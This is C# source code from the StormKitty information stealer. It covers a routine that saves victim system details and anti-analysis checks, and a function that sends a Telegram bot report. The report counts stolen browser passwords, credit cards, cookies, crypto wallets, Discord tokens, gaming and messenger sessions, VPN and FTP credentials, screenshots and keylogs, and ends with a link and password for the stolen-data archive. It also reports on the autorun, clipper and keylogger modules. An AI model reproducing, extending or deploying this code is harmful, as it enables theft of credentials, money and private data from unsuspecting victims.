public static void Save(string sSavePath)
{
try
{
string SystemInfoText = (""
+ "\n[IP]"
+ "\nExternal IP: " + SystemInfo.GetPublicIP()
+ "\nInternal IP: " + SystemInfo.GetLocalIP()
+ "\nGateway IP: " + SystemInfo.GetDefaultGateway()
+ "\n"
+ "\n[Machine]"
+ "\nUsername: "******"\nCompname: " + SystemInfo.compname
+ "\nSystem: " + SystemInfo.GetSystemVersion()
+ "\nCPU: " + SystemInfo.GetCPUName()
+ "\nGPU: " + SystemInfo.GetGPUName()
+ "\nRAM: " + SystemInfo.GetRamAmount()
+ "\nDATE: " + SystemInfo.datenow
+ "\nSCREEN: " + SystemInfo.ScreenMetrics()
+ "\nBATTERY: " + SystemInfo.GetBattery()
+ "\nWEBCAMS COUNT: " + WebcamScreenshot.GetConnectedCamerasCount()
+ "\n"
+ "\n[Virtualization]"
+ "\nVirtualMachine: " + AntiAnalysis.VirtualBox()
+ "\nSandBoxie: " + AntiAnalysis.SandBox()
+ "\nEmulator: " + AntiAnalysis.Emulator()
+ "\nDebugger: " + AntiAnalysis.Debugger()
+ "\nProcesse: " + AntiAnalysis.Processes()
+ "\nHosting: " + AntiAnalysis.Hosting()
+ "\nAntivirus: " + SystemInfo.GetAntivirus()
+ "\n");
System.IO.File.WriteAllText(sSavePath, SystemInfoText);
} catch (System.Exception ex) { Logging.Log("SysInfo >> Failed fetch system info\n" + ex); }
}
/// <summary>
/// Format system information for sending to telegram bot
/// </summary>
/// <returns>String with formatted system information</returns>
private static void SendSystemInfo(string url)
{
UploadKeylogs();
// Get info
string info = (""
+ "\n š¹ *StormKitty - Report:*"
+ "\nDate: " + SystemInfo.datenow
+ "\nSystem: " + SystemInfo.GetSystemVersion()
+ "\nUsername: "******"\nCompName: " + SystemInfo.compname
+ "\nLanguage: " + Flags.GetFlag(SystemInfo.culture.Split('-')[1]) + " " + SystemInfo.culture
+ "\nAntivirus: " + SystemInfo.GetAntivirus()
+ "\n"
+ "\n š» *Hardware:*"
+ "\nCPU: " + SystemInfo.GetCPUName()
+ "\nGPU: " + SystemInfo.GetGPUName()
+ "\nRAM: " + SystemInfo.GetRamAmount()
+ "\nPower: " + SystemInfo.GetBattery()
+ "\nScreen: " + SystemInfo.ScreenMetrics()
+ "\nWebcams count: " + WebcamScreenshot.GetConnectedCamerasCount()
+ "\n"
+ "\n š” *Network:* "
+ "\nGateway IP: " + SystemInfo.GetDefaultGateway()
+ "\nInternal IP: " + SystemInfo.GetLocalIP()
+ "\nExternal IP: " + SystemInfo.GetPublicIP()
+ "\n" + SystemInfo.GetLocation()
+ "\n"
+ "\n šø *Domains info:*"
+ Counter.GetLValue("š¦ *Banking services*", Counter.DetectedBankingServices, '-')
+ Counter.GetLValue("š° *Cryptocurrency services*", Counter.DetectedCryptoServices, '-')
+ Counter.GetLValue("šØ *Social networks*", Counter.DetectedSocialServices, '-')
+ Counter.GetLValue("š *P**n websites*", Counter.DetectedPornServices, '-')
+ GetKeylogsHistory()
+ "\n"
+ "\n š *Browsers:*"
+ Counter.GetIValue("š Passwords", Counter.Passwords)
+ Counter.GetIValue("š³ CreditCards", Counter.CreditCards)
+ Counter.GetIValue("šŖ Cookies", Counter.Cookies)
+ Counter.GetIValue("š AutoFill", Counter.AutoFill)
+ Counter.GetIValue("ā³ History", Counter.History)
+ Counter.GetIValue("š Bookmarks", Counter.Bookmarks)
+ Counter.GetIValue("š¦ Downloads", Counter.Downloads)
+ "\n"
+ "\n š *Software:*"
+ Counter.GetIValue("š° Wallets", Counter.Wallets)
+ Counter.GetIValue("š” FTP hosts", Counter.FTPHosts)
+ Counter.GetIValue("š VPN accounts", Counter.VPN)
+ Counter.GetIValue("š¦¢ Pidgin accounts", Counter.Pidgin)
+ Counter.GetSValue("š« Outlook accounts", Counter.Outlook)
+ Counter.GetSValue("āļø Telegram sessions", Counter.Telegram)
+ Counter.GetSValue("āļø Skype session", Counter.Skype)
+ Counter.GetSValue("š¬ Discord token", Counter.Discord)
+ Counter.GetSValue("š® Steam session", Counter.Steam)
+ Counter.GetSValue("š® Uplay session", Counter.Uplay)
+ Counter.GetSValue("š® BattleNET session", Counter.BattleNET)
+ "\n"
+ "\n š§ *Device:*"
+ Counter.GetSValue("š Windows product key", Counter.ProductKey)
+ Counter.GetIValue("š° Wifi networks", Counter.SavedWifiNetworks)
+ Counter.GetSValue("šø Webcam screenshot", Counter.WebcamScreenshot)
+ Counter.GetSValue("š Desktop screenshot", Counter.DesktopScreenshot)
+ "\n"
+ "\n š¦ *Installation:*"
+ Counter.GetBValue(Config.Autorun == "1" && (Counter.BankingServices || Counter.CryptoServices),
"ā
Startup installed", "āļø Startup disabled")
+ Counter.GetBValue(Config.ClipperModule == "1" && Counter.CryptoServices && Config.Autorun == "1",
"ā
Clipper installed", "āļø Clipper not installed")
+ Counter.GetBValue(Config.KeyloggerModule == "1" && Counter.BankingServices && Config.Autorun == "1",
"ā
Keylogger installed", "āļø Keylogger not installed")
+ "\n"
+ "\n š *File Grabber:*" + ((Config.GrabberModule != "1") ? "\n ā āļø Disabled in configuration" : "")
+ Counter.GetIValue("š Images", Counter.GrabberImages)
+ Counter.GetIValue("š Documents", Counter.GrabberDocuments)
+ Counter.GetIValue("š Database files", Counter.GrabberDatabases)
+ Counter.GetIValue("š Source code files", Counter.GrabberSourceCodes)
+ "\n"
+ $"\nš [Archive download link]({url})"
+ "\nš *Archive password is*: \"_" + Implant.StringsCrypt.ArchivePassword + "\"_"
);
int last = GetLatestMessageId();
if (last != -1)
{
EditMessage(info, last);
}
else
{
SetLatestMessageId(SendMessage(info));
}
}
